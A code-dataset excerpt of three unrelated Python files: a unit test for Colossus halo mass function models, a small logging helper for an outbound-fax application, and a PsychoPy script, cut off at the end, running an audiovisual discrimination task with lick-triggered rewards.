+{"seq_id":"439090686","text":"###################################################################################################\n#\n# test_lss_mass_function.py (c) Benedikt Diemer\n# \t\t\t\t \t benedikt.diemer@cfa.harvard.edu\n#\n###################################################################################################\n\nimport unittest\nimport numpy as np\n\nfrom colossus.tests import test_colossus\nfrom colossus.cosmology import cosmology\nfrom colossus.lss import mass_function\nfrom colossus.lss import peaks\n\n###################################################################################################\n# TEST CASES\n###################################################################################################\n\nclass TCMassFunction(test_colossus.ColosssusTestCase):\n\n\tdef setUp(self):\n\t\tcosmology.setCosmology('planck15', {'persistence': ''})\n\t\tpass\n\t\t\n\tdef test_hmfInput(self):\n\t\t\n\t\tM = 1E12\n\t\tz = 1.0\n\t\tnu = peaks.peakHeight(M, z)\n\t\tdelta_c = peaks.collapseOverdensity()\n\t\tsigma = delta_c / nu\n\t\t\n\t\tcorrect = 4.432081012627e-01\n\t\t\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity M.')\t\t\t\n\n\t\tmf = mass_function.massFunction(sigma, z, q_in = 'sigma', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity sigma.')\t\t\t\n\n\t\tmf = mass_function.massFunction(nu, z, q_in = 'nu', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity nu.')\t\t\t\n\n\tdef test_hmfConvert(self):\n\t\t\n\t\tM = 1E13\n\t\tz = 0.2\n\t\t\n\t\tcorrect = 4.496509540103e-01\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'f')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity f.')\t\t\t\n\n\t\tcorrect = 6.782011823365e-04\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'dndlnM')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity dndlnM.')\t\t\t\n\n\t\tcorrect = 7.910798600386e-02\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'M2dndM')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity M2dndM.')\t\t\t\n\t\t\t\t\n\tdef test_hmfModelsFOF(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' 
% (k)\n\t\t\t\n\t\t\tif not 'fof' in models[k].mdefs:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'press74':\n\t\t\t\tcorrect = [2.236817414379e-01, 1.792404500225e-02]\n\t\t\telif k == 'sheth99':\n\t\t\t\tcorrect = [2.037009972300e-01, 3.218302373538e-02]\n\t\t\telif k == 'jenkins01':\n\t\t\t\tcorrect = [6.026069725012e-02, 3.439425663994e-02]\n\t\t\telif k == 'reed03':\n\t\t\t\tcorrect = [2.037009972300e-01, 2.876252283306e-02]\n\t\t\telif k == 'warren06':\n\t\t\t\tcorrect = [2.176065144322e-01, 3.381465783767e-02]\n\t\t\telif k == 'reed07':\n\t\t\t\tcorrect = [1.912774404547e-01, 3.725141648998e-02]\n\t\t\telif k == 'crocce10':\n\t\t\t\tcorrect = [2.196760269744e-01, 4.196271782970e-02]\n\t\t\telif k == 'bhattacharya11':\n\t\t\t\tcorrect = [2.241120148148e-01, 4.066855813171e-02]\n\t\t\telif k == 'courtin11':\n\t\t\t\tcorrect = [1.519159471219e-01, 4.490343243803e-02]\n\t\t\telif k == 'angulo12':\n\t\t\t\tcorrect = [2.283404301823e-01, 3.771150749193e-02]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [2.847700292451e-01, 3.805146849248e-02]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' % k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), 0.0, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = 'fof', model = k), correct, msg = msg)\n\n\tdef test_hmfModelsSO_200m(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' % (k)\n\t\t\t\n\t\t\tmdef = '200m'\n\t\t\tz = 1.0\n\t\t\t\n\t\t\tif not (('*' in models[k].mdefs) or (mdef in models[k].mdefs)):\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'tinker08':\n\t\t\t\tcorrect = [2.510097130127e-01, 4.616673996075e-05]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [1.621407762267e-01, 4.432897408699e-05]\n\t\t\telif k == 'bocquet16':\n\t\t\t\tcorrect = [2.836176934812e-01, 3.836934411575e-05]\n\t\t\telif k == 'despali16':\n\t\t\t\tcorrect = [2.566857998226e-01, 6.649213465912e-05]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' % k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), z, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = mdef, model = k), correct, msg = msg)\n\n\tdef test_hmfModelsSO_vir(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' % (k)\n\t\t\t\n\t\t\tmdef = 'vir'\n\t\t\tz = 1.0\n\t\t\t\n\t\t\tif not (('*' in models[k].mdefs) or (mdef in models[k].mdefs)):\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'tinker08':\n\t\t\t\tcorrect = [2.509240630699e-01, 4.545587447828e-05]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [1.613521597080e-01, 4.371829786360e-05]\n\t\t\telif k == 'despali16':\n\t\t\t\tcorrect = [2.566082087345e-01, 6.545617453508e-05]\n\t\t\telif k == 'comparat17':\n\t\t\t\tcorrect = [2.449535870384e-01, 2.345606191508e-05]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' 
% k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), z, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = mdef, model = k), correct, msg = msg)\n\n###################################################################################################\n# TRIGGER\n###################################################################################################\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"simulations/Colossus/colossus/tests/test_lss_mass_function.py","file_name":"test_lss_mass_function.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399724145","text":"\"\"\"\nobf_logger.py:\n Define couple logging functions to use for the application to \n log debug/error/info/warning messages\n\"\"\"\n\nimport logging\nimport logging.handlers\nimport os\nimport obf_global_vars\n\n__author__ = obf_global_vars.AUTHORS\n__copyright__ = obf_global_vars.COPYRIGHT\n__credits__ = obf_global_vars.CREDITS\n__license__ = obf_global_vars.LICENSE\n__version__ = obf_global_vars.VERSION\n__maintainer__ = obf_global_vars.MAINTAINER\n__email__ = obf_global_vars.EMAIL\n__status__ = obf_global_vars.STATUS\n\n#\n# Set up logging to file if at least DEBUG level logging\n#\nFORMAT = '%(name)-12s: %(asctime)s %(levelname)-8s %(message)s'\nfh = logging.handlers.RotatingFileHandler(obf_global_vars.OBF_LOG_FILE, maxBytes=1024000, backupCount=3)\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(logging.Formatter(FORMAT))\n\nlogger = logging.getLogger(\"Outbound faxes\")\nlogger.addHandler(fh)\n\n#\n# Writes INFO messages or higher to the sys.stderr\n#\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n\n# Set a format which is simpler for console use\nformatter = logging.Formatter(FORMAT)\n\n# Tell the handler to use this format\nconsole.setFormatter(formatter)\n\n# Add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\ndef debug(msg):\n if __debug__:\n logger.debug(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef error(msg):\n logger.error(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef info(msg):\n logger.info(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef warning(msg):\n logger.warning(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n","sub_path":"src/obf_logger.py","file_name":"obf_logger.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"77728966","text":"from psychopy import visual, core, data, event, logging, sound, gui\r\nfrom psychopy.constants import * # things like STARTED, FINISHED\r\nimport numpy as np # whole numpy lib is available, prepend 'np.'\r\nfrom numpy.random import random, randint, normal, shuffle\r\nimport os # handy system and path functions\r\nimport glob\r\nimport time\r\nfrom functions.movie_functions import load_movie, load_next_stimulus\r\nfrom modules.Serial_functions import open_serial, send_data_until_confirmation\r\nfrom modules.functions import calibrate_lick_sensor, lick_detection, led_on, led_off, give_reward\r\n\r\nn_trials = 500\r\nvalve_duration = 100 # in ms\r\ndistractor_contrast = 1\r\n\r\ntest_mode = True\r\nif not test_mode:\r\n serial_obj = open_serial(COM_port='COM3', baudrate=9600)\r\n # ADJUST_TOUCHLEVEL = 75\r\n # send_data_until_confirmation(serial_obj, header_byte=ADJUST_TOUCHLEVEL, data=[3])\r\n calibrate_lick_sensor(serial_obj)\r\n print('ready')\r\n\r\n give_reward(serial_obj, valve_duration=valve_duration)\r\n#\r\n\r\nsound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1.0, loops=0, sampleRate=44100, hamming=True, name='', autoLog=True)\r\nsound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1.0, loops=0, sampleRate=44100, hamming=True, name='', autoLog=True)\r\n\r\n# Ensure that relative paths start from the same directory as this script\r\n_thisDir = os.path.dirname(os.path.abspath(__file__))\r\nos.chdir(_thisDir)\r\n\r\n# Store info about the experiment session\r\nexpName = 'Audiovisual_dist 50p'\r\nexpInfo = {'participant': '', 'session': '001'}\r\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\r\nif not dlg.OK:\r\n core.quit() # user pressed cancel\r\n#\r\n\r\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\r\n\r\nexpInfo['expName'] = expName\r\nimage_list = (0.38, 0.38, 0.38)\r\n#print image_list\r\ntrialnumber = 0\r\nbias = np.zeros((n_trials, 4))\r\n#print len(bias)\r\nlast_choice = ''\r\nleft = 0\r\nright = 0\r\nsame = 0\r\nopposite = 0\r\ncorrect_trials = np.zeros((n_trials, 1))\r\nreactiontime = np.zeros((n_trials, 1))\r\ncorrectstim = ''\r\norientation_difference=0\r\norientation=0\r\ncorrect_trial=0\r\nsave_reactiontime=0\r\nsave_correct=0\r\nsave_difference=0\r\nsave_orientation=0\r\ncorrect_orientation=0\r\norientation_range=1\r\norientation_diff_list=[90]\r\ntouch_delay=0\r\nlick_delay=0\r\ncorrect_output=0\r\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\r\nfilename = _thisDir + os.sep + 'data' + os.sep + '%s_%s_%s' % \\\r\n (expInfo['participant'], os.path.splitext(expName)[0], expInfo['date'])\r\n\r\n# An ExperimentHandler isn't essential but helps with data saving\r\nthisExp = data.ExperimentHandler(name=os.path.splitext(expName)[0], version='', extraInfo=expInfo, runtimeInfo=None,\r\n originPath=None, savePickle=True, saveWideText=True, dataFileName=filename)\r\n#save a log file for detail verbose info\r\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\r\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\r\n\r\nendExpNow = False # flag for 'escape' or other condition => quit the exp\r\n\r\n# Start Code - component code to be run before the window creation\r\n\r\n# Setup the Window\r\n# size=(1920, 1080)\r\nwin = visual.Window(size=(600, 400), fullscr=True, screen=1, allowGUI=False, allowStencil=False,\r\n monitor='testMonitor', color=[-0.01, -0.01, -0.01], colorSpace='rgb',\r\n blendMode='avg', 
useFBO=True, multiSample=True, numSamples=16)\r\n\r\nwin.mouseVisible = False\r\n# store frame rate of monitor if we can measure it successfully\r\nexpInfo['frameRate']=win.getActualFrameRate()\r\nif expInfo['frameRate'] is not None:\r\n    frameDur = 1.0/round(expInfo['frameRate'])\r\nelse:\r\n    frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\r\n#\r\n\r\n# Initialize components for Routine \"trial\"\r\ntrialClock = core.Clock()\r\nISI = core.StaticPeriod(win=win, screenHz=expInfo['frameRate'], name='ISI')\r\n\r\nfile_name = [['phaseDiff_target_1.mp4', 'phaseDiff_distractor_1.mp4'],\r\n             ['phaseDiff_target_2.mp4', 'phaseDiff_distractor_2.mp4'],\r\n             ['phaseDiff_target_3.mp4', 'phaseDiff_distractor_3.mp4']]\r\n\r\ntarget_file_path, distractor_file_path = file_name[np.random.randint(len(file_name))]\r\n\r\ntarget_mov = load_movie(win, target_file_path, noAudio=False, opacity=1., pos=(200, 0))\r\ndistractor_mov = load_movie(win, distractor_file_path, noAudio=True, opacity=distractor_contrast, pos=(-200, 0))\r\n\r\n# target_mov.setAutoDraw(True)\r\n# distractor_mov.setAutoDraw(True)\r\n\r\ntarget_mov.stop()\r\ndistractor_mov.stop()\r\n\r\n# target_mov.play()\r\n# distractor_mov.play()\r\n\r\nmouse = event.Mouse(win=win, visible=False)\r\nx, y = [None, None]\r\ncross = visual.ShapeStim(win=win, name='cross', units='cm',\r\n                         vertices=((0, -0.5), (0, 0.5), (0,0), (-0.5,0), (0.5, 0)),\r\n                         lineWidth=3,\r\n                         closeShape=False,\r\n                         lineColor='white'\r\n)\r\n\r\n# Create some handy timers\r\nglobalClock = core.Clock() # to track the time since experiment started\r\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \r\n\r\n# set up handler to look after randomisation of conditions etc\r\nprint('Generating trials ...')\r\ntrials = data.TrialHandler(nReps=n_trials, method='random',\r\n                           extraInfo=expInfo, originPath=None,\r\n                           trialList=[None],\r\n                           seed=None, name='trials')\r\nprint('Done generating trials!')\r\nthisExp.addLoop(trials) # add the loop to the experiment\r\nthisTrial = trials.trialList[0] # so we can initialise stimuli with some values\r\n# abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\r\nif thisTrial != None:\r\n    for paramName in thisTrial.keys():\r\n        exec(paramName + '= thisTrial.' + paramName)\r\n\r\nfor thisTrial in trials:\r\n    stop_session = False\r\n\r\n    currentLoop = trials\r\n    # abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)\r\n    if thisTrial != None:\r\n        for paramName in thisTrial.keys():\r\n            exec(paramName + '= thisTrial.' 
+ paramName)\r\n \r\n #------Prepare to start Routine \"trial\"-------\r\n t = 0\r\n trialClock.reset() # clock \r\n frameN = -1\r\n routineTimer.add(121.000000)\r\n # update component parameters for each repeat\r\n # setup some python lists for storing info about the mouse\r\n # keep track of which components have finished\r\n trialComponents = []\r\n trialComponents.append(ISI)\r\n trialComponents.append(cross)\r\n trialComponents.append(target_mov)\r\n trialComponents.append(distractor_mov)\r\n trialComponents.append(mouse)\r\n for thisComponent in trialComponents:\r\n if hasattr(thisComponent, 'status'):\r\n thisComponent.status = NOT_STARTED\r\n \r\n # chosen_image=np.random.randint(0, high=len(image_list))\r\n # target_mov.setSF(image_list[chosen_image])\r\n # distractor_mov.setSF(image_list[chosen_image])\r\n # #target_mov.setImage(image_list[chosen_image])\r\n # #distractor_mov.setImage(image_list[chosen_image])\r\n trialnumber=trialnumber+1\r\n # orientation_list=[90]\r\n # orientation_list=(orientation_list)\r\n mouse.setPos((0, 0))\r\n\r\n #\r\n \r\n # ## bias correction\r\n if trialnumber < 10:\r\n if np.random.uniform(0, high=100) <= 50:\r\n # load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n # target_path=file_name[1], distractor_path=file_name[0], target_side_left=False)\r\n #\r\n # # target_mov = load_movie(win, file_path, noAudio=True, opacity=1.)\r\n # # distractor_mov = load_movie(win, file_path_2, noAudio=True, opacity=1.)\r\n # target_mov.play()\r\n # distractor_mov.play()\r\n\r\n '''\r\n orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n target_mov.setOri(orientation)\r\n orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n correct_orientation=int(orientation+orientation_difference)\r\n distractor_mov.setOri(correct_orientation)\r\n correctstim='right'\r\n '''\r\n correctstim = 'right'\r\n #\r\n \r\n if np.random.uniform(0, high=100) > 50:\r\n '''\r\n orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n distractor_mov.setOri(orientation)\r\n orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n correct_orientation=int(orientation+orientation_difference)\r\n target_mov.setOri(correct_orientation)\r\n correctstim='left'\r\n '''\r\n\r\n # # target_mov = load_movie(win, file_path_2, noAudio=True, opacity=1.)\r\n # # distractor_mov = load_movie(win, file_path, noAudio=False, opacity=1.)\r\n # load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n # target_path=file_name[1], distractor_path=file_name[0],\r\n # target_side_left=correctstim == 'left')\r\n # target_mov.play()\r\n # distractor_mov.play()\r\n\r\n correctstim = 'left'\r\n #\r\n else:\r\n # Use Bias-correction\r\n bias_left = np.abs(left)\r\n bias_right = np.abs(right)\r\n bias_same = np.abs(same)\r\n bias_opposite = np.abs(opposite)\r\n if np.abs(bias_left-bias_right) == np.abs(bias_same-bias_opposite):\r\n if np.random.uniform(0, high=100) <= 50:\r\n # orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n # target_mov.setOri(orientation)\r\n # orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n # correct_orientation=int(orientation+orientation_difference)\r\n # distractor_mov.setOri(correct_orientation)\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n\r\n if np.abs(bias_left-bias_right) > 
np.abs(bias_same-bias_opposite):\r\n if bias_left > bias_right:\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n\r\n if np.abs(bias_left-bias_right) < np.abs(bias_same-bias_opposite):\r\n if bias_same < bias_opposite:\r\n if last_choice == 'left':\r\n correctstim = 'left'\r\n \r\n if last_choice == 'right':\r\n correctstim = 'right'\r\n #\r\n \r\n if bias_same > bias_opposite:\r\n if last_choice == 'left':\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n #\r\n #\r\n\r\n #\r\n\r\n # ##################################################################################################################\r\n # Update Stimuli:\r\n\r\n target_file_path, distractor_file_path = file_name[np.random.randint(len(file_name))]\r\n load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n target_path=target_file_path, distractor_path=distractor_file_path,\r\n target_side_left=correctstim == 'left', distractor_opacity=distractor_contrast)\r\n target_mov.play()\r\n distractor_mov.play()\r\n # ##################################################################################################################\r\n\r\n # gerion = 0\r\n\r\n #-------Start Routine \"trial\"-------\r\n continueRoutine = True\r\n while continueRoutine and routineTimer.getTime() > 0:\r\n # get current time\r\n t = trialClock.getTime()\r\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\r\n # mouse.setPos((0, 0))\r\n\r\n # # # # # # # # #\r\n # INSERT - GERION\r\n # if t > 6 and gerion == 0:\r\n # if np.random.rand() > 0.5:\r\n # mouse.setPos((1, 0))\r\n # print('Simulated answer: LEFT')\r\n # else:\r\n # mouse.setPos((0, 1))\r\n # print('Simulated answer: RIGHT')\r\n # #\r\n # elif t > 20:\r\n # core.quit()\r\n #\r\n # # # # # # # # #\r\n\r\n x, y = mouse.getPos()\r\n # mouse_info = mouse.getPos()[0]\r\n mouse_info = x\r\n # print(mouse_info)\r\n\r\n # target_mov.setPhase(t*2)\r\n # distractor_mov.setPhase(t*2)\r\n if t > 120:\r\n print('timeout')\r\n core.quit()\r\n # print mouse_info\r\n # update/draw components on each frame\r\n if mouse_info > 0:\r\n bias[trialnumber-1, 0] = 1 # colloumnds in bias array: 0=left, 1=right, 2=same. 
3=opposite\r\n bias[trialnumber-1, 1] = 0\r\n last_choice = 'left'\r\n if mouse_info < 0:\r\n bias[trialnumber-1, 0] = 0\r\n bias[trialnumber-1, 1] = 1\r\n last_choice='right'\r\n \r\n # *cross* updates\r\n if t >= 0.5 and cross.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n cross.tStart = t # underestimates by a little under one framef\r\n cross.frameNStart = frameN # exact frame index\r\n cross.setAutoDraw(True)\r\n if cross.status == STARTED and t >= (0.5 + (0.5-win.monitorFramePeriod*0.75)): # most of one frame period left\r\n cross.setAutoDraw(False)\r\n # *ISI* period\r\n if t >= 0.0 and ISI.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n ISI.tStart = t # underestimates by a little under one frame\r\n ISI.frameNStart = frameN # exact frame index\r\n ISI.start(0.5)\r\n elif ISI.status == STARTED: #one frame should pass before updating params and completing\r\n ISI.complete() #finish the static period\r\n # *target_mov* updates\r\n if t >= 1.2 and target_mov.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n target_mov.tStart = t # underestimates by a little under one frame\r\n target_mov.frameNStart = frameN # exact frame index\r\n target_mov.setAutoDraw(True)\r\n distractor_mov.setAutoDraw(True)\r\n if target_mov.status == STARTED and mouse_info != 0: # most of one frame period left\r\n target_mov.setAutoDraw(False)\r\n distractor_mov.setAutoDraw(False)\r\n if mouse_info > 0:\r\n # last_choice == 'left'\r\n # reactiontime[trialnumber-1] = 0\r\n save_reactiontime = 0\r\n if correctstim == 'left' and trialnumber > 0:\r\n touch_delay = trialClock.getTime()\r\n correct_trials[trialnumber-1] = 1.\r\n correct_trial = 1.\r\n sound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1., loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_2.play()\r\n # # distractor_mov.setAutoDraw(False)\r\n # target_mov.setAutoDraw(False)\r\n distractor_mov.stop()\r\n target_mov.stop()\r\n time.sleep(0.4)\r\n\r\n if not test_mode:\r\n led_on(serial_obj)\r\n stop_session = lick_detection(win, serial_obj, valve_duration=valve_duration)\r\n led_off(serial_obj)\r\n #\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n \r\n if correctstim=='right' and trialnumber>0:\r\n correct_trial=0.\r\n touch_delay=trialClock.getTime()\r\n win.color=[1,1,1]\r\n win.flip()\r\n # sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=0.5, loops=0, sampleRate=44100, bits=16, hamming=True, start=0, stop=-1, name='', autoLog=True)\r\n sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1., loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_1.play()\r\n time.sleep(0.2)\r\n mouse.setPos((0,0))\r\n # target_mov.setAutoDraw(False)\r\n # # distractor_mov.setAutoDraw(False)\r\n target_mov.stop()\r\n distractor_mov.stop()\r\n\r\n if not test_mode:\r\n stop_session = lick_detection(win, serial_obj, rewarded=False, valve_duration=valve_duration)\r\n #\r\n win.color=[0,0,0]\r\n win.flip()\r\n\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n\r\n # *distractor_mov* updates\r\n # if t >= 1.2 and distractor_mov.status == NOT_STARTED:\r\n # # keep track of start time/frame for later\r\n # distractor_mov.tStart = t # underestimates by a little under one frame\r\n # distractor_mov.frameNStart = frameN # exact frame index\r\n # distractor_mov.setAutoDraw(True)\r\n if mouse_info != 0.: # most of one frame period left\r\n # 
distractor_mov.setAutoDraw(False)\r\n        if mouse_info < 0:\r\n            last_choice = 'right'\r\n            reactiontime[trialnumber-1]=0\r\n            save_reactiontime=0\r\n            if correctstim=='right' and trialnumber>0:\r\n                touch_delay=trialClock.getTime()\r\n                correct_trials[trialnumber-1]=1.\r\n                correct_trial=1\r\n                sound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1.0, loops=0,\r\n                                      sampleRate=44100, hamming=True, name='', autoLog=True)\r\n                sound_2.play()\r\n                target_mov.stop()\r\n                distractor_mov.stop()\r\n                time.sleep(0.4)\r\n\r\n                if not test_mode:\r\n                    led_on(serial_obj)\r\n                    stop_session = lick_detection(win, serial_obj, valve_duration=valve_duration)\r\n                    led_off(serial_obj)\r\n                #\r\n                # distractor_mov.setAutoDraw(False)\r\n                # target_mov.setAutoDraw(False)\r\n\r\n                lick_delay=trialClock.getTime()\r\n                mouse.setPos((0,0))\r\n            \r\n            if correctstim=='left' and trialnumber>0:\r\n                correct_trial=0.\r\n                touch_delay=trialClock.getTime()\r\n                win.color=[1,1,1]\r\n                win.flip()\r\n                # sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=0.5, loops=0, bits=16,\r\n                #                       sampleRate=44100, hamming=True, start=0, stop=-1, name='', autoLog=True)\r\n                sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1., loops=0,\r\n                                      sampleRate=44100, hamming=True, name='', autoLog=True)\r\n                sound_1.play()\r\n                time.sleep(0.2)\r\n                # target_mov.setAutoDraw(False)\r\n                # distractor_mov.setAutoDraw(False)\r\n                target_mov.stop()\r\n                distractor_mov.stop()\r\n                win.flip()\r\n\r\n                if not test_mode:\r\n                    stop_session = lick_detection(win, serial_obj, rewarded=False, valve_duration=valve_duration)\r\n                #\r\n\r\n                win.color=[0,0,0]\r\n                win.flip()\r\n\r\n                lick_delay=trialClock.getTime()\r\n                mouse.setPos((0,0))\r\n        \r\n        save_orientation=int(orientation)\r\n        save_correct=int(correct_trial)\r\n        save_difference=int(np.abs(correct_orientation-orientation))\r\n        save_reactiontime=float(save_reactiontime)\r\n        \r\n        # *mouse* updates\r\n        if t >= 0.0 and mouse.status == NOT_STARTED:\r\n            # keep track of start time/frame for later\r\n            mouse.tStart = t # underestimates by a little under one frame\r\n            mouse.frameNStart = frameN # exact frame index\r\n            mouse.status = STARTED\r\n            mouse.setPos((0,0))\r\n            event.mouseButtons = [0, 0, 0] # reset mouse buttons to be 'up'\r\n        if mouse.status == STARTED and mouse_info!=0: #most of one frame period left\r\n            mouse.status = STOPPED\r\n        #if mouse.status == STARTED: # only update if started and not stopped!\r\n        # buttons = mouse.getPressed()\r\n        # if sum(buttons) > 0: # ie if any button is pressed\r\n        # abort routine on response\r\n        # continueRoutine = False\r\n        # *ISI* period\r\n        if t >= 0.0 and ISI.status == NOT_STARTED:\r\n            # keep track of start time/frame for later\r\n            ISI.tStart = t # underestimates by a little under one frame\r\n            ISI.frameNStart = frameN # exact frame index\r\n            ISI.start(0.5)\r\n        elif ISI.status == STARTED: #one frame should pass before updating params and completing\r\n            ISI.complete() #finish the static period\r\n        \r\n        # check if all components have finished\r\n        if not continueRoutine: # a component has requested a forced-end of Routine\r\n            break\r\n        continueRoutine = False # will revert to True if at least one component still running\r\n        for thisComponent in trialComponents:\r\n            if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\r\n                continueRoutine = True\r\n                break # at least one component has not yet finished\r\n        \r\n        \r\n        # check for quit (the Esc key)\r\n        if stop_session or endExpNow or event.getKeys(keyList=[\"escape\"]):\r\n            stop_session = 
True\r\n break\r\n #\r\n\r\n # refresh the screen\r\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\r\n win.flip()\r\n if bias[trialnumber-1,0]+bias[trialnumber-2,0]==2:\r\n bias[trialnumber-1,2]=1\r\n if bias[trialnumber-1,0]+bias[trialnumber-2,0]==1:\r\n bias[trialnumber-1,3]=1\r\n if bias[trialnumber-1,1]+bias[trialnumber-2,1]==2:\r\n bias[trialnumber-1,2]=1\r\n if bias[trialnumber-1,1]+bias[trialnumber-2,1]==1:\r\n bias[trialnumber-1,3]=1\r\n \r\n if trialnumber>10:\r\n left=np.sum(bias[trialnumber-11:trialnumber-1,0])\r\n right=np.sum(bias[trialnumber-11:trialnumber-1,1])\r\n same=np.sum(bias[trialnumber-11:trialnumber-1,2])\r\n opposite=np.sum(bias[trialnumber-11:trialnumber-1,3])\r\n \r\n correct_output=correct_output+correct_trial\r\n print(correct_output/trialnumber)\r\n \r\n #-------Ending Routine \"trial\"-------\r\n for thisComponent in trialComponents:\r\n if hasattr(thisComponent, \"setAutoDraw\"):\r\n thisComponent.setAutoDraw(False)\r\n # store data for trials (TrialHandler)\r\n # trials.addData('imagename', image_list[chosen_image])\r\n\r\n trials.addData('mouse.x', x)\r\n trials.addData('mouse.y', y)\r\n trials.addData('target_movie', target_file_path)\r\n trials.addData('distractor_movie', distractor_file_path)\r\n trials.addData('distractor_contrast', distractor_contrast)\r\n trials.addData('correct',save_correct)\r\n trials.addData('Difference',save_difference)\r\n trials.addData('touch_delay', touch_delay)\r\n trials.addData('lick_delay', lick_delay)\r\n trials.addData('orientation', save_orientation)\r\n trials.addData('correctstim', correctstim)\r\n trials.addData('last_choice', last_choice)\r\n #trials.addData('bias', bias)\r\n thisExp.nextEntry()\r\n\r\n try:\r\n if stop_session:\r\n break\r\n #\r\n except:\r\n pass\r\n #\r\n#\r\n\r\nwin.close()\r\nthisExp.saveAsWideText(filename+'.csv')\r\nthisExp.saveAsPickle(filename)\r\nlogging.flush()\r\n# make sure everything is closed down\r\nthisExp.abort() # or data files will save again on exit\r\n# while True:\r\n# time.sleep(1.)\r\n# #\r\n# while True:\r\n# if event.getKeys(keyList=[\"escape\"]):\r\n# break\r\n# #\r\n# #\r\n\r\n# time.sleep(20.)\r\ndlg = gui.DlgFromDict(dictionary={'press OK': 'press OK'}, 